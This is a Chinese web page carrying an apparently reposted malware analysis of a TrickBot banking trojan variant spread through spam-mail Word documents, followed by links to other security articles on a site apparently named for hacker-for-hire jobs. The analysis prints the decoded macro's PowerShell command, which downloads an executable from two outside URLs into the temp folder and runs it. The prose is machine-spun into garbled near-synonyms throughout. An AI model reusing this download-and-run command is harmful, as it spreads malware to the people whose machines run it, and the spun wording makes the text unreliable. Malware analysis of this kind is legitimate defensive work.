TrickBot银行木马归来突击全球金融机构

访客5年前关于黑客接单1129

一、布景
最近国外安全研究人员发现TrickBot银行木马最新的样本,深服气EDR安全团队对此事进行了相关跟进,获取到了相应的样本,并对样本进行了详细剖析,承认此样本为TrickBot银行盗号木马的最新变种样本,而且此样本十分活泼,最近一段时间更新十分频频。
TrickBot银行木马是一款专门针对各国银行进行进犯的歹意样本,它之前被黑客团伙用于进犯全球多个国家的金融机构,主要是经过垃圾邮件的 *** 进行进犯,此次发现的样本会对全球数百家大型银行网站进行进犯,部分银行列表如下:

二、样本运转流程

三、样本剖析
邮件附件DOC样本(重命名为Trickbot.doc),如下所示:

打开文档之后,如下所示:

剖析DOC文件档,发现里边包括VBA宏代码,如下所示:

经过VBA宏编辑器解析DOC文档中的宏代码,如下所示:

动态调试解密里边的宏代码,经过CMD /C履行如下PowerShell脚本:
powershell “function [随机名]([string] $[随机名]){(new-object system.net.webclient).downloadfile($[随机名],’%temp%[随机名].exe’);
start-process ‘%temp%[随机名].exe’;}
try{[随机名](‘http://whitakerfamily.info/ico.ico‘)}catch{[随机名](‘http://rayanat.com/ico.ico‘)}
经过powershell脚本下载相应的TrickBot歹意程序,并履行。
TrickBot母体程序(随机名重命名为TrickBot.exe),如下所示:

1.读取样本相应的资源数据到内存中,如下所示:

资源的ID:BBVCXZIIUHGSWQ,资源数据如下所示:

2.创立窗口,发送音讯,如下所示:

3.对获取到的资源数据进行加解密相关操作,如下所示:

从程序中导入密钥1,如下所示:

从程序中导入密钥2,如下所示:

最终经过CryptEncrypt对数据进行操作,如下所示:

履行之后,在内存中将资源数据复原为一个Payload的数据,如下所示:

4.然后在内存加载复原出来的payload数据,如下所示:

5.复原出来的payload其实是一个DLL,内存加载DLL,如下所示:

定位到DLL的进口点:10001900处,如下所示:

6.判别DLL的进口函数是否为shellcode_main,如下所示:

[1] [2] [3] [4]  黑客接单网

相关文章

Game-of-Thrones-CTF-1靶机彻底攻略

虚拟机地址:https://www.vulnhub.com/entry/game-of-thrones-ctf-1,201/ 这个靶机的难度较高,进程并不是趁热打铁,所以经过了屡次替换网络和IP的进程...

Web 服务器基准测验,nginx+php vs Apache+php

本次测验nginx+php与apache+php哪种组合的核算性能及稳定性更佳 操作系统:Centos6.4 x64 硬件环境:   服务器IP 硬件装备 人物 192.168.1.2 4中心 8G...

浅谈RASP技能攻防之根底篇

本文就笔者研讨RASP的进程进行了一些概述,技能干货略少,倾向于遍及RASP技能。中心对java怎么完成rasp技能进行了简略的举例,想对咱们起到抛砖引玉的效果,能够让咱们更好的了解一些关于web运用...

Python中eval带来的潜在危险

eval是Python用于履行python表达式的一个内置函数,运用eval,能够很便利的将字符串动态履行。比方下列代码: >>> eval("1+2") >>>...

新式鼠标光标绑架进犯将答应进犯者绑架GoogleChrome会话

近期,研究人员发现了一种新式的技能支持欺诈技能,进犯者能够使用这种技能来绑架Google Chrome用户的阅读会话。 想必我们对技能支持欺诈不会感到生疏,微软Windows的技能支持站点便是许多进犯...

PHP中该怎样避免SQL注入?

问题描述: 假如用户输入的数据在未经处理的情况下刺进到一条SQL查询句子,那么运用将很可能遭受到SQL注入进犯,正如下面的比如: $unsafe_variable = $_POST['user_in...